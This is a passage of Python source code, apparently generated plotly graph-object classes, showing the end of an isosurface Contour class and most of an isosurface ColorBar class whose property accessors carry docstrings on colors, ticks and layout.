        [1, 16].

        Returns
        -------
        int|float
        """
        return self["width"]

    @width.setter
    def width(self, val):
        self["width"] = val

    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        """Return the path string of this object's parent ('isosurface')."""
        return "isosurface"

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        # Returned verbatim; content and indentation are significant.
        return """\
        color
            Sets the color of the contour lines.
        show
            Sets whether or not dynamic contours are shown on hover
        width
            Sets the width of the contour lines.
        """

    def __init__(self, arg=None, color=None, show=None, width=None, **kwargs):
        """
        Construct a new Contour object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Contour
        color
            Sets the color of the contour lines.
        show
            Sets whether or not dynamic contours are shown on hover
        width
            Sets the width of the contour lines.

        Returns
        -------
        Contour
        """
        super(Contour, self).__init__("contour")

        # Normalize `arg` into a plain dict we can safely pop() from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Contour
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Contour"""
            )

        # `skip_invalid` is consumed here and reset to False at the end.
        self._skip_invalid = kwargs.pop("skip_invalid", False)

        from plotly.validators.isosurface import contour as v_contour

        # One validator instance per property.
        self._validators["color"] = v_contour.ColorValidator()
        self._validators["show"] = v_contour.ShowValidator()
        self._validators["width"] = v_contour.WidthValidator()

        # Explicit keyword arguments take precedence over values in `arg`.
        for name, value in (("color", color), ("show", show), ("width", width)):
            fallback = arg.pop(name, None)
            self[name] = value if value is not None else fallback

        # Anything left in `arg`, plus unknown kwargs, is processed together.
        self._process_kwargs(**dict(arg, **kwargs))

        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class ColorBar(_BaseTraceHierarchyType):
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the color of padded area.
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['bgcolor']
@bgcolor.setter
def bgcolor(self, val):
self['bgcolor'] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the axis line color.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['bordercolor']
@bordercolor.setter
def bordercolor(self, val):
self['bordercolor'] = val
# borderwidth
# -----------
@property
def borderwidth(self):
"""
Sets the width (in px) or the border enclosing this color bar.
The 'borderwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['borderwidth']
@borderwidth.setter
def borderwidth(self, val):
self['borderwidth'] = val
# dtick
# -----
@property
def dtick(self):
"""
Sets the step in-between ticks on this axis. Use with `tick0`.
Must be a positive number, or special strings available to
"log" and "date" axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick number. For
example, to set a tick mark at 1, 10, 100, 1000, ... set dtick
to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2.
To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special values;
"L<f>", where `f` is a positive number, gives ticks linearly
spaced in value (but not position). For example `tick0` = 0.1,
`dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To
show powers of 10 plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and
"D2". If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval between
ticks to one day, set `dtick` to 86400000.0. "date" also has
special values "M<n>" gives ticks spaced by a number of months.
`n` must be a positive integer. To set ticks on the 15th of
every third month, set `tick0` to "2000-01-15" and `dtick` to
"M3". To set ticks every 4 years, set `dtick` to "M48"
The 'dtick' property accepts values of any type
Returns
-------
Any
"""
return self['dtick']
@dtick.setter
def dtick(self, val):
self['dtick'] = val
# exponentformat
# --------------
@property
def exponentformat(self):
"""
Determines a formatting rule for the tick exponents. For
example, consider the number 1,000,000,000. If "none", it
appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If "SI", 1G. If
"B", 1B.
The 'exponentformat' property is an enumeration that may be specified as:
- One of the following enumeration values:
['none', 'e', 'E', 'power', 'SI', 'B']
Returns
-------
Any
"""
return self['exponentformat']
@exponentformat.setter
def exponentformat(self, val):
self['exponentformat'] = val
# len
# ---
@property
def len(self):
"""
Sets the length of the color bar This measure excludes the
padding of both ends. That is, the color bar length is this
length minus the padding on both ends.
The 'len' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['len']
@len.setter
def len(self, val):
self['len'] = val
# lenmode
# -------
@property
def lenmode(self):
"""
Determines whether this color bar's length (i.e. the measure in
the color variation direction) is set in units of plot
"fraction" or in *pixels. Use `len` to set the value.
The 'lenmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self['lenmode']
@lenmode.setter
def lenmode(self, val):
self['lenmode'] = val
# nticks
# ------
@property
def nticks(self):
"""
Specifies the maximum number of ticks for the particular axis.
The actual number of ticks will be chosen automatically to be
less than or equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
The 'nticks' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self['nticks']
@nticks.setter
def nticks(self, val):
self['nticks'] = val
# outlinecolor
# ------------
@property
def outlinecolor(self):
"""
Sets the axis line color.
The 'outlinecolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['outlinecolor']
@outlinecolor.setter
def outlinecolor(self, val):
self['outlinecolor'] = val
# outlinewidth
# ------------
@property
def outlinewidth(self):
"""
Sets the width (in px) of the axis line.
The 'outlinewidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['outlinewidth']
@outlinewidth.setter
def outlinewidth(self, val):
self['outlinewidth'] = val
# separatethousands
# -----------------
@property
def separatethousands(self):
"""
If "true", even 4-digit integers are separated
The 'separatethousands' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['separatethousands']
@separatethousands.setter
def separatethousands(self, val):
self['separatethousands'] = val
# showexponent
# ------------
@property
def showexponent(self):
"""
If "all", all exponents are shown besides their significands.
If "first", only the exponent of the first tick is shown. If
"last", only the exponent of the last tick is shown. If "none",
no exponents appear.
The 'showexponent' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showexponent']
@showexponent.setter
def showexponent(self, val):
self['showexponent'] = val
# showticklabels
# --------------
@property
def showticklabels(self):
"""
Determines whether or not the tick labels are drawn.
The 'showticklabels' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['showticklabels']
@showticklabels.setter
def showticklabels(self, val):
self['showticklabels'] = val
# showtickprefix
# --------------
@property
def showtickprefix(self):
"""
If "all", all tick labels are displayed with a prefix. If
"first", only the first tick is displayed with a prefix. If
"last", only the last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
The 'showtickprefix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showtickprefix']
@showtickprefix.setter
def showtickprefix(self, val):
self['showtickprefix'] = val
# showticksuffix
# --------------
@property
def showticksuffix(self):
"""
Same as `showtickprefix` but for tick suffixes.
The 'showticksuffix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showticksuffix']
@showticksuffix.setter
def showticksuffix(self, val):
self['showticksuffix'] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of the color bar This measure excludes the
size of the padding, ticks and labels.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['thickness']
@thickness.setter
def thickness(self, val):
self['thickness'] = val
# thicknessmode
# -------------
@property
def thicknessmode(self):
"""
Determines whether this color bar's thickness (i.e. the measure
in the constant color direction) is set in units of plot
"fraction" or in "pixels". Use `thickness` to set the value.
The 'thicknessmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self['thicknessmode']
@thicknessmode.setter
def thicknessmode(self, val):
self['thicknessmode'] = val
# tick0
# -----
@property
def tick0(self):
"""
Sets the placement of the first tick on this axis. Use with
`dtick`. If the axis `type` is "log", then you must take the
log of your starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when `dtick`=*L<f>* (see
`dtick` for more info). If the axis `type` is "date", it should
be a date string, like date data. If the axis `type` is
"category", it should be a number, using the scale where each
category is assigned a serial number from zero in the order it
appears.
The 'tick0' property accepts values of any type
Returns
-------
Any
"""
return self['tick0']
@tick0.setter
def tick0(self, val):
self['tick0'] = val
# tickangle
# ---------
@property
def tickangle(self):
"""
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the tick
labels vertically.
The 'tickangle' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self['tickangle']
@tickangle.setter
def tickangle(self, val):
self['tickangle'] = val
# tickcolor
# ---------
@property
def tickcolor(self):
"""
Sets the tick color.
The 'tickcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['tickcolor']
@tickcolor.setter
def tickcolor(self, val):
self['tickcolor'] = val
# tickfont
# --------
@property
def tickfont(self):
"""
Sets the color bar's tick label font
The 'tickfont' property is an instance of Tickfont
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Tickfont
- A dict of string/value properties that will be passed
to the Tickfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.isosurface.colorbar.Tickfont
"""
return self['tickfont']
@tickfont.setter
def tickfont(self, val):
self['tickfont'] = val
# tickformat
# ----------
@property
def tickformat(self):
"""
Sets the tick label formatting rule using d3 formatting mini-
languages which are very similar to those in Python. For
numbers, see: https://github.com/d3/d3-format/blob/master/READM
E.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We add one item to
d3's date formatter: "%{n}f" for fractional seconds with n
digits. For example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display "09~15~23.46"
The 'tickformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['tickformat']
@tickformat.setter
def tickformat(self, val):
self['tickformat'] = val
# tickformatstops
# ---------------
@property
def tickformatstops(self):
"""
The 'tickformatstops' property is a tuple of instances of
Tickformatstop that may be specified as:
- A list or tuple of instances of plotly.graph_objs.isosurface.colorbar.Tickformatstop
- A list or tuple of dicts of string/value properties that
will be passed to the Tickformatstop constructor
Supported dict properties:
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
Returns
-------
tuple[plotly.graph_objs.isosurface.colorbar.Tickformatstop]
"""
return self['tickformatstops']
@tickformatstops.setter
def tickformatstops(self, val):
self['tickformatstops'] = val
# tickformatstopdefaults
# ----------------------
@property
def tickformatstopdefaults(self):
"""
When used in a template (as layout.template.data.isosurface.col
orbar.tickformatstopdefaults), sets the default property values
to use for elements of isosurface.colorbar.tickformatstops
The 'tickformatstopdefaults' property is an instance of Tickformatstop
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Tickformatstop
- A dict of string/value properties that will be passed
to the Tickformatstop constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.isosurface.colorbar.Tickformatstop
"""
return self['tickformatstopdefaults']
@tickformatstopdefaults.setter
def tickformatstopdefaults(self, val):
self['tickformatstopdefaults'] = val
# ticklen
# -------
@property
def ticklen(self):
"""
Sets the tick length (in px).
The 'ticklen' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['ticklen']
@ticklen.setter
def ticklen(self, val):
self['ticklen'] = val
# tickmode
# --------
@property
def tickmode(self):
"""
Sets the tick mode for this axis. If "auto", the number of
ticks is set via `nticks`. If "linear", the placement of the
ticks is determined by a starting position `tick0` and a tick
step `dtick` ("linear" is the default value if `tick0` and
`dtick` are provided). If "array", the placement of the ticks
is set via `tickvals` and the tick text is `ticktext`. ("array"
is the default value if `tickvals` is provided).
The 'tickmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['auto', 'linear', 'array']
Returns
-------
Any
"""
return self['tickmode']
@tickmode.setter
def tickmode(self, val):
self['tickmode'] = val
# tickprefix
# ----------
@property
def tickprefix(self):
"""
Sets a tick label prefix.
The 'tickprefix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['tickprefix']
@tickprefix.setter
def tickprefix(self, val):
self['tickprefix'] = val
# ticks
# -----
@property
def ticks(self):
"""
Determines whether ticks are drawn or not. If "", this axis'
ticks are not drawn. If "outside" ("inside"), this axis' are
drawn outside (inside) the axis lines.
The 'ticks' property is an enumeration that may be specified as:
- One of the following enumeration values:
['outside', 'inside', '']
Returns
-------
Any
"""
return self['ticks']
@ticks.setter
def ticks(self, val):
self['ticks'] = val
# ticksuffix
# ----------
@property
def ticksuffix(self):
"""
Sets a tick label suffix.
The 'ticksuffix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['ticksuffix']
@ticksuffix.setter
def ticksuffix(self, val):
self['ticksuffix'] = val
# ticktext
# --------
@property
def ticktext(self):
"""
Sets the text displayed at the ticks position via `tickvals`.
Only has an effect if `tickmode` is set to "array". Used with
`tickvals`.
The 'ticktext' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['ticktext']
@ticktext.setter
def ticktext(self, val):
self['ticktext'] = val
# ticktextsrc
# -----------
@property
def ticktextsrc(self):
"""
Sets the source reference on plot.ly for ticktext .
The 'ticktextsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['ticktextsrc']
@ticktextsrc.setter
def ticktextsrc(self, val):
self['ticktextsrc'] = val
# tickvals
# --------
@property
def tickvals(self):
"""
Sets the values at which ticks on this axis appear. Only has an
effect if `tickmode` is set to "array". Used with `ticktext`.
The 'tickvals' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['tickvals']
@tickvals.setter
def tickvals(self, val):
self['tickvals'] = val
# tickvalssrc
# -----------
@property
def tickvalssrc(self):
"""
Sets the source reference on plot.ly for tickvals .
The 'tickvalssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['tickvalssrc']
@tickvalssrc.setter
def tickvalssrc(self, val):
self['tickvalssrc'] = val
# tickwidth
# ---------
@property
def tickwidth(self):
"""
Sets the tick width (in px).
The 'tickwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['tickwidth']
@tickwidth.setter
def tickwidth(self, val):
self['tickwidth'] = val
# title
# -----
@property
def title(self):
"""
The 'title' property is an instance of Title
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Title
- A dict of string/value properties that will be passed
to the Title constructor
Supported dict properties:
font
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
side
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
text
Sets the title of the color bar. Note that
before the existence of `title.text`, the
title's contents used to be defined as the
`title` attribute itself. This behavior has
been deprecated.
Returns
-------
plotly.graph_objs.isosurface.colorbar.Title
"""
return self['title']
@title.setter
def title(self, val):
self['title'] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Deprecated: Please use isosurface.colorbar.title.font instead.
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.title.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
"""
return self['titlefont']
@titlefont.setter
def titlefont(self, val):
self['titlefont'] = val
# titleside
# ---------
@property
def titleside(self):
"""
Deprecated: Please use isosurface.colorbar.title.side instead.
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
"""
return self['titleside']
@titleside.setter
def titleside(self, val):
self['titleside'] = val
# x
# -
@property
def x(self):
"""
Sets the x position of the color bar (in plot fraction).
The 'x' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self['x']
@x.setter
def x(self, val):
self['x'] = val
# xanchor
# -------
@property
def xanchor(self):
"""
Sets this color bar's horizontal position anchor. This anchor
binds the `x` position to the "left", "center" or "right" of
the color bar.
The 'xanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'center', 'right']
Returns
-------
Any
"""
return self['xanchor']
@xanchor.setter
def xanchor(self, val):
self['xanchor'] = val
# xpad
# ----
@property
def xpad(self):
"""
Sets the amount of padding (in px) along the x direction.
The 'xpad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['xpad']
@xpad.setter
def xpad(self, val):
self['xpad'] = val
# y
# -
@property
def y(self):
"""
Sets the y position of the color bar (in plot fraction).
The 'y' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self['y']
@y.setter
def y(self, val):
self['y'] = val
# yanchor
# -------
@property
def yanchor(self):
"""
Sets this color bar's vertical position anchor This anchor
binds the `y` position to the "top", "middle" or "bottom" of
the color bar.
The 'yanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'middle', 'bottom']
Returns
-------
Any
"""
return self['yanchor']
@yanchor.setter
def yanchor(self, val):
self['yanchor'] = val
# ypad
# ----
@property
def ypad(self):
"""
Sets the amount of padding (in px) along the y direction.
The 'ypad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['ypad']
@ypad.setter
def ypad(self, val):
self['ypad'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        # One-line description of every ColorBar property. The base class
        # consumes this runtime string when building constructor docstrings
        # and validation error messages, so its content must stay verbatim.
        return """\
        bgcolor
            Sets the color of padded area.
        bordercolor
            Sets the axis line color.
        borderwidth
            Sets the width (in px) or the border enclosing this
            color bar.
        dtick
            Sets the step in-between ticks on this axis. Use with
            `tick0`. Must be a positive number, or special strings
            available to "log" and "date" axes. If the axis `type`
            is "log", then ticks are set every 10^(n*dtick) where n
            is the tick number. For example, to set a tick mark at
            1, 10, 100, 1000, ... set dtick to 1. To set tick marks
            at 1, 100, 10000, ... set dtick to 2. To set tick marks
            at 1, 5, 25, 125, 625, 3125, ... set dtick to
            log_10(5), or 0.69897000433. "log" has several special
            values; "L<f>", where `f` is a positive number, gives
            ticks linearly spaced in value (but not position). For
            example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
            at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
            small digits between, use "D1" (all digits) or "D2"
            (only 2 and 5). `tick0` is ignored for "D1" and "D2".
            If the axis `type` is "date", then you must convert the
            time to milliseconds. For example, to set the interval
            between ticks to one day, set `dtick` to 86400000.0.
            "date" also has special values "M<n>" gives ticks
            spaced by a number of months. `n` must be a positive
            integer. To set ticks on the 15th of every third month,
            set `tick0` to "2000-01-15" and `dtick` to "M3". To set
            ticks every 4 years, set `dtick` to "M48"
        exponentformat
            Determines a formatting rule for the tick exponents.
            For example, consider the number 1,000,000,000. If
            "none", it appears as 1,000,000,000. If "e", 1e+9. If
            "E", 1E+9. If "power", 1x10^9 (with 9 in a super
            script). If "SI", 1G. If "B", 1B.
        len
            Sets the length of the color bar This measure excludes
            the padding of both ends. That is, the color bar length
            is this length minus the padding on both ends.
        lenmode
            Determines whether this color bar's length (i.e. the
            measure in the color variation direction) is set in
            units of plot "fraction" or in *pixels. Use `len` to
            set the value.
        nticks
            Specifies the maximum number of ticks for the
            particular axis. The actual number of ticks will be
            chosen automatically to be less than or equal to
            `nticks`. Has an effect only if `tickmode` is set to
            "auto".
        outlinecolor
            Sets the axis line color.
        outlinewidth
            Sets the width (in px) of the axis line.
        separatethousands
            If "true", even 4-digit integers are separated
        showexponent
            If "all", all exponents are shown besides their
            significands. If "first", only the exponent of the
            first tick is shown. If "last", only the exponent of
            the last tick is shown. If "none", no exponents appear.
        showticklabels
            Determines whether or not the tick labels are drawn.
